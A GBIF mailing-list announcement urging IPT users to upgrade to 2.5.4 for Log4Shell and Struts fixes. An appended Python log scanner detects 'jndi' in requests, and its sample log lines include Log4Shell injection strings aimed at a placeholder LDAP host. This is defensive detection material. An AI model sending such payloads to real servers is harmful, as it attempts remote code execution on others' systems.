[IPT] IPT security update (Log4J / Log4Shell exploit)

Matthew Blissett mblissett at gbif.org
Sat Dec 11 09:55:35 UTC 2021


Dear IPT users,

We have released a new version of the IPT, version 2.5.4 [1]. This 
version contains fixes to critical security issues with the Struts and 
Log4J[2] libraries.

According to the press [3], the problem with the Log4J library 
vulnerability is being exploited by malicious users — and I can already 
see queries containing "jndi" in the web server logs for the IPTs GBIF 
hosts at cloud.gbif.org, although they are random attempts and would not 
succeed.

All users are highly encouraged to upgrade to this version as soon as 
possible.

As usual, upgrade and installation instructions are in the manual [1]. 
Please remember to check your data directory backup is working before 
starting the upgrade.

[1] https://ipt.gbif.org/manual/en/ipt/2.5/releases#2-5-4-december-2021

[2] https://www.lunasec.io/docs/blog/log4j-zero-day/

[3] https://www.theguardian.com/technology/2021/dec/10/software-flaw-most-critical-vulnerability-log-4-shell

Best regards,

Matthew
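
Added example (not part of the original message and not IPT project code): a small scanner for the kind of check described above, listing web server log entries whose request line, referer or user agent contains "jndi". It assumes the Apache/nginx "combined" log format; the sample lines, IP addresses and host name are constructed.

```python
import re
from urllib.parse import unquote_plus

# Assumed layout: Apache/nginx "combined" access log format.
LINE_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) \S+(?: "(?P<referer>[^"]*)" "(?P<agent>[^"]*)")?'
)

def decode(value, rounds=3):
    """Percent-decode until stable (bounded), so encoded values compare in clear form."""
    for _ in range(rounds):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return value

def find_jndi_requests(lines):
    """Return one record per log line whose request, referer or user agent contains "jndi"."""
    hits = []
    for number, line in enumerate(lines, 1):
        match = LINE_RE.match(line)
        if match:
            fields = {k: match.group(k) or "" for k in ("request", "referer", "agent")}
        else:
            fields = {"raw": line}  # unparsed line: scan it whole rather than skip it
        where = sorted(k for k, v in fields.items() if "jndi" in decode(v).lower())
        if where:
            hits.append({"line": number,
                         "ip": match.group("ip") if match else None,
                         "status": match.group("status") if match else None,
                         "fields": where})
    return hits

# Constructed sample lines (documentation IP ranges, placeholder host name).
SAMPLE_LOG = [
    '192.0.2.10 - - [11/Dec/2021:08:01:02 +0000] "GET /ipt/ HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [11/Dec/2021:08:03:44 +0000] "GET /ipt/?q=%24%7Bjndi%3Aldap%3A%2F%2Fhost.example.invalid%2Fa%7D HTTP/1.1" 404 196 "-" "curl/7.79.1"',
    '203.0.113.5 - - [11/Dec/2021:08:04:10 +0000] "GET / HTTP/1.1" 200 612 "-" "${jndi:ldap://host.example.invalid/a}"',
    '192.0.2.44 - - [11/Dec/2021:08:05:00 +0000] "GET /ipt/resource?r=birds HTTP/1.1" 200 9000 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for hit in find_jndi_requests(SAMPLE_LOG):
        print(hit)
```

A hit records that a request containing the string arrived, not that it succeeded; the upgrade to 2.5.4 described in the message remains the fix.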



